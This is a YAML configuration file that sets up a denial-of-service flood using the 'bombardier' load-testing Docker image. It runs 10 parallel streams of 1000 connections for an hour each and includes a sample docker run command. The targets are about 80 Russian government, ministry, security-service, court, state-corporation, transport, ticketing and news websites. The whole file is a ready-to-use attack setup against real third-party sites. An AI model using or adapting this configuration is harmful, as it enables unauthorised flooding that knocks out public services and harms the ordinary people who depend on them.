# Docker image that alredy pull to local env
image_name: "alpine/bombardier"

# Set of the parallelism
parallel_stream: 10  # set number parallel streams

#docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://www.gosuslugi.ru

number_conn: 1000
timeout: 3600s

sites: "
http://www.kremlin.ru/
http://www.scrf.gov.ru/
http://sovetnational.ru/
http://president-sovet.ru/
http://www.council.gov.ru/
http://www.duma.gov.ru/
http://www.ksrf.ru/
http://www.vsrf.ru/
http://government.ru/
http://mvd.ru/
https://www.mchs.gov.ru/
http://www.mid.ru/ru/home
https://mil.ru/
https://minjust.gov.ru/
https://minzdrav.gov.ru/
http://mkrf.ru/
http://edu.gov.ru/
http://minobrnauki.gov.ru/
http://www.mnr.gov.ru/
http://minpromtorg.gov.ru/
http://minvr.ru/
http://www.mcx.ru/
http://www.minsport.gov.ru/
http://www.minstroyrf.ru/
http://www.mintrans.ru/
http://www.rosmintrud.ru/
http://minfin.ru/
http://economy.gov.ru/
http://minenergo.gov.ru/
http://www.fsvts.gov.ru/
http://www.fstec.ru/
http://www.fsin.su
http://www.fssprus.ru/
http://gfs.gov.ru/
http://svr.gov.ru/
http://www.fsb.ru/
http://rosgvard.ru/
http://www.fso.gov.ru/
http://www.fedsfm.ru/
http://www.meteorf.ru/
http://rpn.gov.ru/
http://www.fsvps.ru/
http://www.rostransnadzor.ru/
http://www.rostrud.ru/
http://www.nalog.ru/
http://www.probpalata.ru
http://fsrar.ru/
http://www.customs.gov.ru/
http://www.roskazna.ru/
http://rkn.gov.ru/
http://www.fsa.gov.ru/
http://rosstat.gov.ru/
http://www.rupto.ru/
http://fas.gov.ru/
http://www.rosreestr.ru/
http://rospotrebnadzor.ru/
http://www.roszdravnadzor.ru
http://obrnadzor.gov.ru/
http://www.gosnadzor.ru/
http://www.rosatom.ru/
http://www.roscosmos.ru/
http://www.asv.org.ru/
https://veb.ru/
http://www.rusnano.com/
http://www.fondgkh.ru/
http://sc-os.ru/
http://rostec.ru/
geocam.ru
rosneft.ru
tutu.ru
rzd.ru
tickets.ru
rkn.gov.ru
https://russian.rt.com/
https://www.politnavigator.news
https://novosti.dn.ua/
https://dnr-news.com/
http://dnr-live.ru/
https://www.gazeta.ru/
https://www.1tv.ru/
https://dan-news.info/
rbc.ru
pasline.ru
bg14.org
"
